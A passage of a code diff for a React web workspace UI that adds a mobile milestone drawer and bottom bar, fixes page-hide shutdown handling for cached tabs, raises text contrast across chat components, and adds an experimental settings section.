+        <Sidebar activeView={activeView} onViewChange={isConnecting ? () => {} : handleViewChange} isConnecting={isConnecting} mobile />
+      </div>
+
+      {/* Mobile milestone drawer */}
+      {mobileMilestoneOpen && (
+        <div
+          className="fixed inset-0 z-40 bg-black/50 md:hidden"
+          onClick={() => setMobileMilestoneOpen(false)}
+          data-testid="mobile-milestone-overlay"
+        />
+      )}
+      {!isWelcomeState && (
+        <div
+          className={cn(
+            "fixed inset-y-0 right-0 z-50 w-72 transform bg-sidebar border-l border-border transition-transform duration-200 ease-out md:hidden",
+            mobileMilestoneOpen ? "translate-x-0" : "translate-x-full",
+          )}
+          data-testid="mobile-milestone-drawer"
+        >
+          <MilestoneExplorer
+            isConnecting={isConnecting}
+            width={288}
+            onCollapse={() => setMobileMilestoneOpen(false)}
+          />
+        </div>
+      )}
+
       <div className="flex flex-1 overflow-hidden">
-        <Sidebar activeView={activeView} onViewChange={isConnecting ? () => {} : handleViewChange} isConnecting={isConnecting} />
+        {/* Desktop sidebar — hidden on mobile */}
+        <div className="hidden md:flex">
+          <Sidebar activeView={activeView} onViewChange={isConnecting ? () => {} : handleViewChange} isConnecting={isConnecting} />
+        </div>
 
         <div className="flex flex-1 flex-col overflow-hidden">
           <div
@@ -368,7 +472,7 @@ function WorkspaceChrome() {
               >
                 <div className="flex items-center gap-2 text-muted-foreground">
                   <span className="font-medium text-foreground">Terminal</span>
-                  <span className="text-[10px] text-muted-foreground/50">
+                  <span className="text-[10px] text-muted-foreground">
                     {isTerminalExpanded ? "▼" : "▲"}
                   </span>
                 </div>
@@ -384,10 +488,10 @@ function WorkspaceChrome() {
           )}
         </div>
 
-        {/* Resizable milestone sidebar — hidden during project welcome */}
+        {/* Resizable milestone sidebar — hidden on mobile, hidden during project welcome */}
         {!isWelcomeState && !sidebarCollapsed && (
           <div
-            className="relative flex h-full items-stretch"
+            className="relative hidden md:flex h-full items-stretch"
             style={{ flexShrink: 0 }}
           >
             {/* Thin visible border */}
@@ -399,18 +503,42 @@ function WorkspaceChrome() {
             />
           </div>
         )}
-        {!isWelcomeState && (sidebarCollapsed ? (
-          <CollapsedMilestoneSidebar onExpand={() => setSidebarCollapsed(false)} />
-        ) : (
-          <MilestoneExplorer
-            isConnecting={isConnecting}
-            width={sidebarWidth}
-            onCollapse={() => setSidebarCollapsed(true)}
-          />
-        ))}
+        <div className="hidden md:flex">
+          {!isWelcomeState && (sidebarCollapsed ? (
+            <CollapsedMilestoneSidebar onExpand={() => setSidebarCollapsed(false)} />
+          ) : (
+            <MilestoneExplorer
+              isConnecting={isConnecting}
+              width={sidebarWidth}
+              onCollapse={() => setSidebarCollapsed(true)}
+            />
+          ))}
+        </div>
       </div>
 
-      <StatusBar />
+      {/* Desktop status bar — hidden on mobile */}
+      <div className="hidden md:block">
+        <StatusBar />
+      </div>
+
+      {/* Mobile bottom bar — quick access to milestones + status */}
+      {!isWelcomeState && (
+        <div className="flex md:hidden h-12 items-center justify-between border-t border-border bg-card px-3" data-testid="mobile-bottom-bar">
+          <div className="flex items-center gap-2 text-xs text-muted-foreground truncate">
+            <span className="sr-only" data-testid="workspace-connection-status-mobile">{status.label}</span>
+            <span className={cn("h-2 w-2 rounded-full shrink-0", status.tone === "success" ? "bg-success" : status.tone === "warning" ? "bg-warning" : status.tone === "danger" ? "bg-destructive" : "bg-muted-foreground")} />
+            <span className="truncate">{scopeLabel}</span>
+          </div>
+          <button
+            onClick={() => setMobileMilestoneOpen(!mobileMilestoneOpen)}
+            className="flex h-10 items-center gap-2 rounded-md px-3 text-xs font-medium text-muted-foreground hover:bg-accent/50 hover:text-foreground transition-colors"
+            data-testid="mobile-milestone-toggle"
+          >
+            Milestones
+          </button>
+        </div>
+      )}
+
       <ProjectsPanel open={projectsPanelOpen} onOpenChange={setProjectsPanelOpen} />
       <CommandSurface />
       <FocusedPanel />
@@ -436,9 +564,18 @@ function ProjectAwareWorkspace() {
   const activeProjectCwd = useSyncExternalStore(manager.subscribe, manager.getSnapshot, manager.getSnapshot)
   const activeStore = activeProjectCwd ? manager.getActiveStore() : null
 
-  // Shut down all projects when the tab actually closes
+  // Shut down all projects when the tab actually closes.
+  // IMPORTANT: pagehide fires both on real page unload AND on mobile/Safari
+  // tab switches (bfcache entry).  When event.persisted is true the page is
+  // being cached for later reuse — the server must stay alive.  Only send
+  // the shutdown beacon when the page is truly being discarded.
   useEffect(() => {
-    const handlePageHide = () => {
+    const handlePageHide = (event: PageTransitionEvent) => {
+      if (event.persisted) {
+        // Page is entering bfcache (tab switch, app backgrounding) — keep
+        // the server alive so PTY sessions survive.
+        return
+      }
       // sendBeacon cannot set custom headers, so pass the auth token as a
       // query parameter instead (the proxy accepts `_token` as a fallback).
       const token = getAuthToken()
diff --git a/web/components/gsd/chat-mode.tsx b/web/components/gsd/chat-mode.tsx
index 53c729f6b..f9a8dd716 100644
--- a/web/components/gsd/chat-mode.tsx
+++ b/web/components/gsd/chat-mode.tsx
@@ -337,7 +337,7 @@ function MarkdownContent({ content }: { content: string }) {
                 })
                 return (
                   <div
-                    className="chat-code-block my-3 rounded-xl overflow-x-auto text-sm shadow-sm border border-border/40"
+                    className="chat-code-block my-3 rounded-xl overflow-x-auto text-sm shadow-sm border border-border/50"
                     dangerouslySetInnerHTML={{ __html: highlighted }}
                   />
                 )
@@ -348,7 +348,7 @@ function MarkdownContent({ content }: { content: string }) {
             if (isInline) {
               return (
                 <code
-                  className="rounded-md bg-muted/80 px-1.5 py-0.5 text-[0.85em] font-mono text-foreground"
+                  className="rounded-md bg-muted px-1.5 py-0.5 text-[0.85em] font-mono text-foreground"
                   {...props}
                 >
                   {children}
@@ -357,7 +357,7 @@ function MarkdownContent({ content }: { content: string }) {
             }
 
             return (
-              <pre className={cn("my-3 overflow-x-auto rounded-xl p-4 text-sm border border-border/40", isDark ? "bg-[#0d1117]" : "bg-[#f6f8fa]")}>
+              <pre className={cn("my-3 overflow-x-auto rounded-xl p-4 text-sm border border-border/50", isDark ? "bg-[#0d1117]" : "bg-[#f6f8fa]")}>
                 <code className="font-mono">{children}</code>
               </pre>
             )
@@ -374,7 +374,7 @@ function MarkdownContent({ content }: { content: string }) {
           },
           th({ children }: { children?: React.ReactNode }) {
             return (
-              <th className="border-b border-border bg-muted/40 px-3 py-2 text-left text-xs font-semibold text-muted-foreground uppercase tracking-wide">
+              <th className="border-b border-border bg-muted/50 px-3 py-2 text-left text-xs font-semibold text-muted-foreground uppercase tracking-wide">
                 {children}
               </th>
             )
@@ -424,7 +424,7 @@ function MarkdownContent({ content }: { content: string }) {
           },
           img({ alt, src }: { alt?: string; src?: string }) {
             return (
-              <span className="my-2 block rounded-lg border border-border bg-muted/20 px-3 py-2 text-xs text-muted-foreground italic">
+              <span className="my-2 block rounded-lg border border-border bg-muted/50 px-3 py-2 text-xs text-muted-foreground italic">
                 🖼 {alt || src || "image"}
               </span>
             )
@@ -559,7 +559,7 @@ function TuiSelectPrompt({
       data-testid="tui-select-prompt"
       tabIndex={0}
       onKeyDown={handleKeyDown}
-      className="mt-2 rounded-xl border border-border/60 bg-background/60 p-1.5 shadow-sm outline-none focus-visible:ring-1 focus-visible:ring-border"
+      className="mt-2 rounded-xl border border-border bg-background p-1.5 shadow-sm outline-none focus-visible:ring-1 focus-visible:ring-border"
       aria-label={`Select: ${prompt.label}`}
       role="listbox"
       aria-activedescendant={`tui-select-option-${localIndex}`}
@@ -584,7 +584,7 @@ function TuiSelectPrompt({
               "flex w-full items-start gap-2 rounded-lg px-3 py-1.5 text-left text-sm transition-colors",
               isSelected
                 ? "bg-primary/15 text-primary font-medium"
-                : "text-foreground hover:bg-muted/60",
+                : "text-foreground hover:bg-muted",
             )}
           >
             <span className="mt-0.5 flex h-4 w-4 flex-shrink-0 items-center justify-center">
@@ -671,7 +671,7 @@ function TuiTextPrompt({
   return (
     <div
       data-testid="tui-text-prompt"
-      className="mt-2 rounded-xl border border-border/60 bg-background/60 p-3 shadow-sm"
+      className="mt-2 rounded-xl border border-border bg-background p-3 shadow-sm"
     >
       {prompt.label && (
         <p className="mb-2 text-[11px] font-medium text-muted-foreground uppercase tracking-wide">
@@ -695,7 +695,7 @@ function TuiTextPrompt({
             "flex h-8 items-center justify-center rounded-lg px-3 text-xs font-medium transition-all",
             value.trim()
               ? "bg-primary text-primary-foreground hover:bg-primary/90 active:scale-95 shadow-sm"
-              : "bg-muted text-muted-foreground/40 cursor-not-allowed",
+              : "bg-muted text-muted-foreground cursor-not-allowed",
           )}
         >
           Submit
@@ -771,7 +771,7 @@ function TuiPasswordPrompt({
   return (
     <div
       data-testid="tui-password-prompt"
-      className="mt-2 rounded-xl border border-border/60 bg-background/60 p-3 shadow-sm"
+      className="mt-2 rounded-xl border border-border bg-background p-3 shadow-sm"
     >
       {prompt.label && (
         <p className="mb-2 text-[11px] font-medium text-muted-foreground uppercase tracking-wide">
@@ -796,7 +796,7 @@ function TuiPasswordPrompt({
             onClick={() => setShowPassword((s) => !s)}
             tabIndex={-1}
             aria-label={showPassword ? "Hide input" : "Show input"}
-            className="absolute right-2.5 top-1/2 -translate-y-1/2 text-muted-foreground/50 hover:text-muted-foreground transition-colors"
+            className="absolute right-2.5 top-1/2 -translate-y-1/2 text-muted-foreground hover:text-muted-foreground transition-colors"
           >
             {showPassword ? (
               <EyeOff className="h-3.5 w-3.5" />
@@ -812,13 +812,13 @@ function TuiPasswordPrompt({
             "flex h-8 items-center justify-center rounded-lg px-3 text-xs font-medium transition-all",
             value
               ? "bg-primary text-primary-foreground hover:bg-primary/90 active:scale-95 shadow-sm"
-              : "bg-muted text-muted-foreground/40 cursor-not-allowed",
+              : "bg-muted text-muted-foreground cursor-not-allowed",
           )}
         >
           Submit
         </button>
       </div>
-      <p className="mt-1.5 text-[10px] text-muted-foreground/50">
+      <p className="mt-1.5 text-[10px] text-muted-foreground">
         Value is transmitted securely and not stored in chat history.
       </p>
     </div>
@@ -910,7 +910,7 @@ function InlineThinking({ content, isStreaming }: { content: string; isStreaming
         onClick={() => setExpanded((e) => !e)}
         className={cn(
           "group w-full rounded-xl border px-3.5 py-2.5 text-left transition-all",
-          "border-border/40 bg-muted/20 hover:bg-muted/30",
+          "border-border/50 bg-muted/50 hover:bg-muted/50",
         )}
       >
         {/* Header row */}
@@ -922,21 +922,21 @@ function InlineThinking({ content, isStreaming }: { content: string; isStreaming
             </span>
           ) : (
             <span className="flex h-4 w-4 flex-shrink-0 items-center justify-center rounded bg-muted-foreground/10">
-              <span className="text-[9px] text-muted-foreground/50">💭</span>
+              <span className="text-[9px] text-muted-foreground">💭</span>
             </span>
           )}
-          <span className="text-[11px] font-medium uppercase tracking-wider text-muted-foreground/50">
+          <span className="text-[11px] font-medium uppercase tracking-wider text-muted-foreground">
             {isStreaming ? "Thinking…" : "Thought process"}
           </span>
           {hasMore && !expanded && (
-            <span className="ml-1 rounded-full bg-muted/60 px-1.5 py-0.5 text-[10px] font-medium text-muted-foreground/40">
+            <span className="ml-1 rounded-full bg-muted px-1.5 py-0.5 text-[10px] font-medium text-muted-foreground">
               {lines.length} lines
             </span>
           )}
           <span className="ml-auto flex-shrink-0">
             {expanded
-              ? <ChevronDown className="h-3 w-3 text-muted-foreground/40 transition-transform" />
-              : <ChevronRight className="h-3 w-3 text-muted-foreground/40 transition-transform group-hover:text-muted-foreground/60" />
+              ? <ChevronDown className="h-3 w-3 text-muted-foreground transition-transform" />
+              : <ChevronRight className="h-3 w-3 text-muted-foreground transition-transform group-hover:text-muted-foreground" />
             }
           </span>
         </div>
@@ -945,7 +945,7 @@ function InlineThinking({ content, isStreaming }: { content: string; isStreaming
         {!expanded && (
           <div className="mt-2 space-y-0.5 border-l-2 border-muted-foreground/10 pl-3">
             {previewLines.map((line, i) => (
-              <p key={i} className="text-[12px] leading-relaxed text-muted-foreground/50 line-clamp-1">
+              <p key={i} className="text-[12px] leading-relaxed text-muted-foreground line-clamp-1">
                 {line}
               </p>
             ))}
@@ -957,7 +957,7 @@ function InlineThinking({ content, isStreaming }: { content: string; isStreaming
         {expanded && (
           <div
             ref={scrollRef}
-            className="mt-2 max-h-[400px] overflow-y-auto overscroll-contain rounded-lg border border-border/30 bg-background/40 p-3 text-[12px] leading-[1.7] text-muted-foreground/60 whitespace-pre-wrap scrollbar-thin scrollbar-thumb-border scrollbar-track-transparent"
+            className="mt-2 max-h-[400px] overflow-y-auto overscroll-contain rounded-lg border border-border/50 bg-background/50 p-3 text-[12px] leading-[1.7] text-muted-foreground whitespace-pre-wrap scrollbar-thin scrollbar-thumb-border scrollbar-track-transparent"
           >
             {content}
             {isStreaming && <StreamingCursor />}
@@ -991,7 +991,7 @@ function ChatBubble({
   if (message.role === "system") {
     return (
       <div className="flex items-center justify-center py-1">
-        <span className="text-[11px] text-muted-foreground/60 italic px-3">
+        <span className="text-[11px] text-muted-foreground italic px-3">
           {message.content}
         </span>
       </div>
@@ -1047,7 +1047,7 @@ function ChatBubble({
       <div className="mt-1 flex-shrink-0 flex h-7 w-7 items-center justify-center rounded-full bg-card border border-border">
         <PlatformLogoIcon className="h-3.5 w-auto" />
       </div>
-      <div className="max-w-[82%] min-w-0 rounded-2xl rounded-tl-md border border-border/60 bg-card px-4 py-3 shadow-sm">
+      <div className="max-w-[82%] min-w-0 rounded-2xl rounded-tl-md border border-border bg-card px-4 py-3 shadow-sm">
         {/* Minimal waiting indicator — shown when streaming starts but no content yet */}
         {isThinking && !message.content && (
           <div className="flex items-center gap-2 py-1">
@@ -1055,7 +1055,7 @@ function ChatBubble({
               <span className="absolute inline-flex h-full w-full animate-ping rounded-full bg-muted-foreground/30" />
               <span className="relative inline-flex h-2 w-2 rounded-full bg-muted-foreground/50" />
             </span>
-            <span className="text-[10px] font-medium text-muted-foreground/40 uppercase tracking-wider">
+            <span className="text-[10px] font-medium text-muted-foreground uppercase tracking-wider">
               Thinking…
             </span>
           </div>
@@ -1326,7 +1326,7 @@ function ChatInputBar({
   const overflowGroups = useMemo(() => groupByCategory(OVERFLOW_ACTIONS), [])
 
   return (
-    <div className="flex-shrink-0 border-t border-border bg-card/80 px-4 py-3 backdrop-blur-sm">
+    <div className="flex-shrink-0 border-t border-border bg-card px-4 py-3 backdrop-blur-sm">
       <div
         className="flex items-end gap-2"
         onDrop={handleDrop}
@@ -1339,8 +1339,8 @@ function ChatInputBar({
           className={cn(
             "flex flex-1 flex-col rounded-xl border bg-background transition-colors",
             connected
-              ? "border-border focus-within:border-border/80 focus-within:ring-1 focus-within:ring-border/30"
-              : "border-border/40 opacity-60",
+              ? "border-border focus-within:ring-1 focus-within:ring-border/30"
+              : "border-border/50 opacity-80",
             isDragging && connected && "border-primary/60 ring-2 ring-primary/20 bg-primary/5",
           )}
         >
@@ -1367,7 +1367,7 @@ function ChatInputBar({
                 </div>
               ))}
               {imageNotice && (
-                <span className="text-[10px] text-muted-foreground/70 italic">{imageNotice}</span>
+                <span className="text-[10px] text-muted-foreground italic">{imageNotice}</span>
               )}
             </div>
           )}
@@ -1386,12 +1386,12 @@ function ChatInputBar({
                 ? "Message…"
                 : "Connecting…"
             }
-            className="min-h-[40px] flex-1 resize-none bg-transparent px-3 py-2.5 text-sm text-foreground placeholder:text-muted-foreground/50 focus:outline-none disabled:cursor-not-allowed disabled:text-muted-foreground"
+            className="min-h-[40px] flex-1 resize-none bg-transparent px-3 py-2.5 text-sm text-foreground placeholder:text-muted-foreground focus:outline-none disabled:cursor-not-allowed disabled:text-muted-foreground"
             style={{ height: "40px", maxHeight: "160px", overflowY: "auto" }}
           />
           <div className="flex flex-shrink-0 items-end pb-1.5 pr-1.5 gap-1">
             {!connected && (
-              <span className="px-2 py-1 text-[10px] font-medium text-muted-foreground/60 uppercase tracking-wide">
+              <span className="px-2 py-1 text-[10px] font-medium text-muted-foreground uppercase tracking-wide">
                 Disconnected
               </span>
             )}
@@ -1403,7 +1403,7 @@ function ChatInputBar({
                 "flex h-7 w-7 items-center justify-center rounded-lg transition-all",
                 hasContent && connected
                   ? "bg-primary text-primary-foreground shadow-sm hover:bg-primary/90 active:scale-95"
-                  : "bg-muted text-muted-foreground/40 cursor-not-allowed",
+                  : "bg-muted text-muted-foreground cursor-not-allowed",
               )}
             >
               <SendHorizonal className="h-3.5 w-3.5" />
@@ -1476,7 +1476,7 @@ function ChatInputBar({
                 {overflowGroups.map((group, gi) => (
                   <div key={group.category}>
                     {gi > 0 && <div className="my-1.5 border-t border-border/50" />}
-                    <p className="px-2 py-1 text-[10px] font-semibold text-muted-foreground/60 uppercase tracking-wider">
+                    <p className="px-2 py-1 text-[10px] font-semibold text-muted-foreground uppercase tracking-wider">
                       {group.label}
                     </p>
                     {group.items.map((action) => {
@@ -1542,9 +1542,9 @@ function PlaceholderState({
     <div className="flex flex-1 flex-col items-center justify-center text-center py-16">
       <div className="flex h-12 w-12 items-center justify-center rounded-full border border-border bg-card">
         {showSpinner ? (
-          <Loader2 className="h-5 w-5 animate-spin text-muted-foreground/70" />
+          <Loader2 className="h-5 w-5 animate-spin text-muted-foreground" />
         ) : (
-          <MessagesSquare className="h-6 w-6 text-muted-foreground/50" />
+          <MessagesSquare className="h-6 w-6 text-muted-foreground" />
         )}
       </div>
       <div className="mt-3 space-y-1">
@@ -1608,7 +1608,7 @@ function InlineUiRequest({ request }: { request: PendingUiRequest }) {
       <div className="mt-1 flex-shrink-0 flex h-7 w-7 items-center justify-center rounded-full bg-card border border-border">
         <PlatformLogoIcon className="h-3.5 w-auto" />
       </div>
-      <div className="max-w-[82%] min-w-0 rounded-2xl rounded-tl-md border border-border/60 bg-card px-4 py-3 shadow-sm">
+      <div className="max-w-[82%] min-w-0 rounded-2xl rounded-tl-md border border-border bg-card px-4 py-3 shadow-sm">
         {request.title && (
           <p className="mb-2.5 text-sm font-medium text-foreground">{request.title}</p>
         )}
@@ -1675,7 +1675,7 @@ function InlineSelect({
               disabled={disabled}
               className={cn(
                 "flex w-full items-center gap-2.5 rounded-lg px-3 py-2 text-left text-sm transition-colors",
-                checked ? "bg-primary/15 text-primary font-medium" : "text-foreground hover:bg-muted/60",
+                checked ? "bg-primary/15 text-primary font-medium" : "text-foreground hover:bg-muted",
               )}
             >
               <span className="flex h-4 w-4 flex-shrink-0 items-center justify-center rounded border border-border">
@@ -1693,7 +1693,7 @@ function InlineSelect({
             disabled={disabled}
             className={cn(
               "flex w-full items-center gap-2.5 rounded-lg px-3 py-2 text-left text-sm transition-colors",
-              selected ? "bg-primary/15 text-primary font-medium" : "text-foreground hover:bg-muted/60",
+              selected ? "bg-primary/15 text-primary font-medium" : "text-foreground hover:bg-muted",
             )}
           >
             <span className="flex h-4 w-4 flex-shrink-0 items-center justify-center">
@@ -1714,7 +1714,7 @@ function InlineSelect({
           "mt-2 flex w-full items-center justify-center rounded-lg px-3 py-2 text-xs font-medium transition-all",
           canSubmit && !disabled
             ? "bg-primary text-primary-foreground hover:bg-primary/90 active:scale-[0.98] shadow-sm"
-            : "bg-muted text-muted-foreground/40 cursor-not-allowed",
+            : "bg-muted text-muted-foreground cursor-not-allowed",
         )}
       >
         {isMulti ? `Submit (${multiValues.size})` : "Submit"}
@@ -1816,7 +1816,7 @@ function InlineInput({
           "flex h-8 items-center justify-center rounded-lg px-3 text-xs font-medium transition-all",
           value.trim() && !disabled
             ? "bg-primary text-primary-foreground hover:bg-primary/90 active:scale-95 shadow-sm"
-            : "bg-muted text-muted-foreground/40 cursor-not-allowed",
+            : "bg-muted text-muted-foreground cursor-not-allowed",
         )}
       >
         Submit
@@ -1927,12 +1927,12 @@ function ToolExecutionBlock({ tool }: { tool: CompletedToolExecution }) {
             "w-full rounded-lg border px-3 py-2 text-left text-xs transition-colors",
             isError
               ? "border-destructive/30 bg-destructive/5 hover:bg-destructive/10"
-              : "border-border/40 bg-muted/20 hover:bg-muted/30",
+              : "border-border/50 bg-muted/50 hover:bg-muted/50",
           )}
         >
           {/* Header */}
           <div className="flex items-center gap-2">
-            <span className={cn("flex-shrink-0", isError ? "text-destructive" : "text-muted-foreground/60")}>
+            <span className={cn("flex-shrink-0", isError ? "text-destructive" : "text-muted-foreground")}>
               {icon}
             </span>
             <span className={cn("font-mono font-medium", isError ? "text-destructive" : "text-muted-foreground")}>
@@ -1942,16 +1942,16 @@ function ToolExecutionBlock({ tool }: { tool: CompletedToolExecution }) {
               <span className="truncate font-mono text-info/80">{shortPath}</span>
             )}
             {bashCommand && !shortPath && (
-              <span className="truncate font-mono text-muted-foreground/70">{bashCommand.length > 60 ? bashCommand.slice(0, 60) + "…" : bashCommand}</span>
+              <span className="truncate font-mono text-muted-foreground">{bashCommand.length > 60 ? bashCommand.slice(0, 60) + "…" : bashCommand}</span>
             )}
-            <span className="ml-auto flex-shrink-0 text-muted-foreground/40">
+            <span className="ml-auto flex-shrink-0 text-muted-foreground">
               {expanded ? <ChevronDown className="h-3 w-3" /> : <ChevronRight className="h-3 w-3" />}
             </span>
           </div>
 
           {/* Expanded content */}
           {expanded && diff && (
-            <div className="mt-2 overflow-x-auto rounded-md border border-border/30 bg-background/80 p-2 font-mono text-[11px] leading-relaxed">
+            <div className="mt-2 overflow-x-auto rounded-md border border-border/50 bg-background p-2 font-mono text-[11px] leading-relaxed">
               {diff.split("\n").map((line, i) => {
                 const isAdd = line.startsWith("+")
                 const isRemove = line.startsWith("-")
@@ -1963,8 +1963,8 @@ function ToolExecutionBlock({ tool }: { tool: CompletedToolExecution }) {
                       "whitespace-pre",
                       isAdd && "bg-success/10 text-success",
                       isRemove && "bg-destructive/10 text-destructive",
-                      isContext && "text-muted-foreground/60",
-                      !isAdd && !isRemove && !isContext && "text-muted-foreground/40",
+                      isContext && "text-muted-foreground",
+                      !isAdd && !isRemove && !isContext && "text-muted-foreground",
                     )}
                   >
                     {line}
@@ -1976,7 +1976,7 @@ function ToolExecutionBlock({ tool }: { tool: CompletedToolExecution }) {
 
           {/* Expanded: bash output or other result */}
           {expanded && !diff && resultText && (
-            <div className="mt-2 max-h-[200px] overflow-y-auto rounded-md border border-border/30 bg-background/80 p-2 font-mono text-[11px] leading-relaxed text-muted-foreground/70 whitespace-pre-wrap">
+            <div className="mt-2 max-h-[200px] overflow-y-auto rounded-md border border-border/50 bg-background p-2 font-mono text-[11px] leading-relaxed text-muted-foreground whitespace-pre-wrap">
               {resultText.length > 2000 ? resultText.slice(0, 2000) + "\n…" : resultText}
             </div>
           )}
@@ -2204,6 +2204,12 @@ export function ChatPane({ className, onOpenAction }: ChatPaneProps) {
 
   const showPlaceholder = timeline.length === 0 && !isStreaming
 
+  // Show an "awaiting input" indicator when the session is idle (connected,
+  // not streaming, has timeline content) so the UI does not appear stuck (#2707).
+  const showAwaitingInput = connected && !isStreaming && timeline.length > 0
+    && !state.activeToolExecution
+    && state.pendingUiRequests.length === 0
+
   // Auto-scroll ref
   const scrollRef = useRef<HTMLDivElement>(null)
   const isNearBottomRef = useRef(true)
@@ -2291,8 +2297,8 @@ export function ChatPane({ className, onOpenAction }: ChatPaneProps) {
                     <div key={`active-${item.tool.id}`} className="flex justify-start gap-3">
                       <div className="w-7 flex-shrink-0" />
                       <div className="max-w-[82%] min-w-0">
-                        <div className="flex items-center gap-2 rounded-lg border border-border/40 bg-muted/20 px-3.5 py-2">
-                          <Loader2 className="h-3 w-3 animate-spin text-muted-foreground/60" />
+                        <div className="flex items-center gap-2 rounded-lg border border-border/50 bg-muted/50 px-3.5 py-2">
+                          <Loader2 className="h-3 w-3 animate-spin text-muted-foreground" />
                           <span className="font-mono text-xs text-muted-foreground">
                             {item.tool.name}
                           </span>
@@ -2309,6 +2315,12 @@ export function ChatPane({ className, onOpenAction }: ChatPaneProps) {
                   return <InlineUiRequest key={item.request.id} request={item.request} />
               }
             })}
+            {showAwaitingInput && (
+              <div className="flex items-center gap-2 px-1 py-1 text-xs text-muted-foreground animate-in fade-in duration-500">
+                <span className="inline-block h-2 w-2 rounded-full bg-emerald-500/70 animate-pulse" />
+                Ready for your input
+              </div>
+            )}
             <div className="h-2" />
           </div>
         )}
diff --git a/web/components/gsd/code-editor.tsx b/web/components/gsd/code-editor.tsx
index 2243fb8f1..164b1ce0c 100644
--- a/web/components/gsd/code-editor.tsx
+++ b/web/components/gsd/code-editor.tsx
@@ -78,7 +78,7 @@ const darkTheme = createTheme({
     selection: "oklch(0.2 0 0)",
     lineHighlight: "oklch(0.12 0 0)",
     gutterBackground: "oklch(0.09 0 0)",
-    gutterForeground: "oklch(0.35 0 0)",
+    gutterForeground: "oklch(0.42 0 0)",
     gutterBorder: "transparent",
   },
   styles: darkStyles,
diff --git a/web/components/gsd/command-surface.tsx b/web/components/gsd/command-surface.tsx
index 179f9fbc0..29e434f3a 100644
--- a/web/components/gsd/command-surface.tsx
+++ b/web/components/gsd/command-surface.tsx
@@ -11,6 +11,7 @@ import {
   Download,
   ExternalLink,
   FileText,
+  FlaskConical,
   FolderRoot,
   GitBranch,
   KeyRound,
@@ -56,7 +57,7 @@ import {
 } from "@/lib/dev-overrides"
 import { DoctorPanel, ForensicsPanel, SkillHealthPanel } from "./diagnostics-panels"
 import { KnowledgeCapturesPanel } from "./knowledge-captures-panel"
-import { PrefsPanel, ModelRoutingPanel, BudgetPanel, RemoteQuestionsPanel, GeneralPanel } from "./settings-panels"
+import { PrefsPanel, ModelRoutingPanel, BudgetPanel, RemoteQuestionsPanel, GeneralPanel, ExperimentalPanel } from "./settings-panels"
 import { DevRootSettingsSection } from "./projects-view"
 import {
   QuickPanel,
@@ -82,7 +83,7 @@ import {
 
 // ─── Section metadata ────────────────────────────────────────────────
 
-const SETTINGS_SURFACE_SECTIONS = ["general", "model", "session-behavior", "recovery", "auth", "integrations", "workspace"] as const
+const SETTINGS_SURFACE_SECTIONS = ["general", "model", "session-behavior", "recovery", "auth", "integrations", "workspace", "experimental"] as const
 const ADMIN_SECTION: CommandSurfaceSection = "admin"
 const GIT_SURFACE_SECTIONS = ["git"] as const
 const SESSION_SURFACE_SECTIONS = ["resume", "name", "fork", "session", "compact"] as const
@@ -125,6 +126,7 @@ function sectionLabel(section: CommandSurfaceSection): string {
     compact: "Compact",
     workspace: "Workspace",
     integrations: "Integrations",
+    experimental: "Experimental",
   }
   return labels[section] ?? section
 }
@@ -149,6 +151,7 @@ function sectionIcon(section: CommandSurfaceSection) {
     compact: <Archive className="h-4 w-4" />,
     workspace: <FolderRoot className="h-4 w-4" />,
     integrations: <Radio className="h-4 w-4" />,
+    experimental: <FlaskConical className="h-4 w-4" />,
   }
   return icons[section] ?? null
 }
@@ -221,7 +224,7 @@ function SectionHeader({
   return (
     <div className="flex items-center justify-between gap-3 pb-4">
       <div className="flex items-center gap-2.5">
-        <h3 className="text-[13px] font-semibold uppercase tracking-[0.08em] text-foreground/70">{title}</h3>
+        <h3 className="text-[13px] font-semibold uppercase tracking-[0.08em] text-muted-foreground">{title}</h3>
         {status}
       </div>
       {action}
@@ -287,7 +290,7 @@ function SegmentedControl<T extends string>({
   disabled?: boolean
 }) {
   return (
-    <div className="inline-flex rounded-lg border border-border/60 bg-card/30 p-0.5">
+    <div className="inline-flex rounded-lg border border-border bg-card/50 p-0.5">
       {options.map((opt) => (
         <button
           key={opt.value}
@@ -435,7 +438,8 @@ export function CommandSurface() {
     } else if (
       (commandSurface.section === "gsd-prefs" ||
        commandSurface.section === "gsd-mode" ||
-       commandSurface.section === "gsd-config") &&
+       commandSurface.section === "gsd-config" ||
+       commandSurface.section === "experimental") &&
       settingsData.phase === "idle"
     ) {
       void loadSettingsData()
@@ -669,7 +673,7 @@ export function CommandSurface() {
         <div className="space-y-4">
           {Array.from(groupedModels.entries()).map(([provider, models]) => (
             <div key={provider}>
-              <div className="mb-1.5 px-1 text-[10px] font-semibold uppercase tracking-widest text-muted-foreground/60">
+              <div className="mb-1.5 px-1 text-[10px] font-semibold uppercase tracking-widest text-muted-foreground">
                 {provider}
               </div>
               <div className="space-y-0.5">
@@ -716,10 +720,10 @@ export function CommandSurface() {
                       {/* Badges */}
                       <div className="flex shrink-0 items-center gap-1.5">
                         {model.isCurrent && (
-                          <span className="rounded bg-foreground/10 px-1.5 py-0.5 text-[10px] font-medium text-foreground/70">Active</span>
+                          <span className="rounded bg-foreground/10 px-1.5 py-0.5 text-[10px] font-medium text-muted-foreground">Active</span>
                         )}
                         {model.reasoning && (
-                          <span className="rounded bg-foreground/10 px-1.5 py-0.5 text-[10px] font-medium text-foreground/70">Thinking</span>
+                          <span className="rounded bg-foreground/10 px-1.5 py-0.5 text-[10px] font-medium text-muted-foreground">Thinking</span>
                         )}
                       </div>
                     </button>
@@ -734,7 +738,7 @@ export function CommandSurface() {
       )}
 
       {/* Apply */}
-      <div className="flex justify-end border-t border-border/40 pt-3">
+      <div className="flex justify-end border-t border-border/50 pt-3">
         <Button
           type="button"
           size="sm"
@@ -802,7 +806,7 @@ export function CommandSurface() {
         })}
       </div>
 
-      <div className="flex justify-end border-t border-border/40 pt-3">
+      <div className="flex justify-end border-t border-border/50 pt-3">
         <Button
           type="button"
           size="sm"
@@ -849,7 +853,7 @@ export function CommandSurface() {
         )}
       </div>
 
-      <div className="border-t border-border/30" />
+      <div className="border-t border-border/50" />
 
       {/* Follow-up mode */}
       <div className="space-y-3">
@@ -1025,7 +1029,7 @@ export function CommandSurface() {
               <LoaderCircle className="h-3.5 w-3.5 animate-spin" />
               Loading diagnostics…
             </div>
-            <div className="flex flex-wrap gap-2 border-t border-border/30 pt-3" data-testid="command-surface-recovery-actions">
+            <div className="flex flex-wrap gap-2 border-t border-border/50 pt-3" data-testid="command-surface-recovery-actions">
               <Button
                 type="button"
                 variant="default"
@@ -1046,7 +1050,7 @@ export function CommandSurface() {
               <div className="text-sm font-medium text-foreground">{diag.summary.label}</div>
